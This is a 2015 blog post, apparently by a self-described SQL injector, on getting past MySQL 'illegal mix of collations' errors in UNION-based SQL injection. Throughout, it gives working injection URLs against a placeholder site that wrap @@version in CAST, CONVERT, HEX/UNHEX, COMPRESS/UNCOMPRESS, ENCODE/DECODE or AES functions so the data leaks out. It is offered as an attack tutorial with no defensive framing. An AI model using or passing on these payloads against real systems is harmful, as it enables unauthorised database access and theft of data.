Saturday, April 25, 2015

How To ByPass Illegal Mix Of Collations

How To ByPass Illegal Mix Of Collations

--------------------------------------------------------------------------------

                ::::::::Watch on Youtube :::::::::



-------------------------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------------------------

Solving this problem as an SQL Injector:


There are several ways you can bypass illegal mix of collations for operation 'union'.

using Cast function.
using convert function.
using HEX/ UNHEX functions.
using Compress/uncompress functions.
using encode/decode functions
using AES Encryption



Bypass illegal mix of collations with CAST function:


Once can bypass this error using CAST function.
cast() function inputs an expression of any type and give result value of given type
Syntax of cast()
Cast(Expression AS type)



http://website.com/page.php?id=1 union select 1,2,cast(@@version as binary)#


Bypass illegal mix of collations with AES_Encrypt() and AES_DECRYPT().


AES_ENCRYPT() AND AES_DECRYPT() can also be used to bypass this error.
AES_ENCRYPT() is used for impmenting ecnryption/decrypyion of given string using
Advance encryption Standard (AES). These functions ecnrypts with a 128 bit key lenght by default. AES_ENCRYPT uses that key with given string to encrypt that string and AES_DECRYPT() is used to decrypt that encrypted string with the key(which we set while encryption) to return the orignal string.

Syntax of AES_ENCRYPT() and AES_DECRYPT()

AES_ENCRYPT(given_string, key)
AES_DECRYPT(encrypted_string, key)

Bypass Example:

Suppose you are facing illegal mix of collations while fetching version() info,
lets take key as 1. your syntax would be like

http://website.com/page.php?id=1 union all select 1,2,AES_DECRYPT(AES_ENCRYPT(version(),1),1)#


Bypass illegal mix of collations with Convert function


Convert() also takes an expression/string any character set and convert it into specified character set.

Syntax of Convert() function:
Convert(given_string USING required_char_set)
Example:

http://website.com/page.php?id=1 union all select 1,2,convert(@@version using ascii)#

Bypass illegal mix of collations using ENCODE(), DECODE()


ENCODE() is also an encryption function of MySQL, it works same like
AES_ENCRYPT(), taking a string and encoding it with a provided key.
And similarly DECODE() function will decode that encoded string by using the key we provided while encryption.


Syntax of ENCODE() and DECODE():
ENCODE('string', key)
DECODE('encoded string', key)

Real time Example 

http://website.com/page.php?id=1 union all select 1,2,decode(encode(@@version,1),1)#

Bypass illegal mix of collations with COMPRESS(), UNCOMPRESS() functions


Compress() functions compresses a string and give the result as  binary string.
and that compressed string can be uncompressed by uncompressed() function later.

Syntax of Compress() and Uncompress(): 
compress('given_string')
uncompress('compressed string')

Real Time Example:

http://website.com/page.php?id=1 union all select 1,2,uncompress(compress(@@version))# 

Bypass illegal mix of collations using HEX() and UNHEX() functions


HEX() functions take a string and results hexadecimal string representation of that given string with each character of given string converted in two hexadecimal digits and the UNHEX() reverse this hexadecimal string back to the Original string.
Syntax of Hex() and Unhex():
HEX('given string')
UNHEX('haxadecimal_of_string')

Real time Example:

http://website.com/page.php?id=1 union all select 1,2,unhex(hex(@@version))#

Auth0R ::: Ahsan Shabbir (God SQLI) 

No comments:

Post a Comment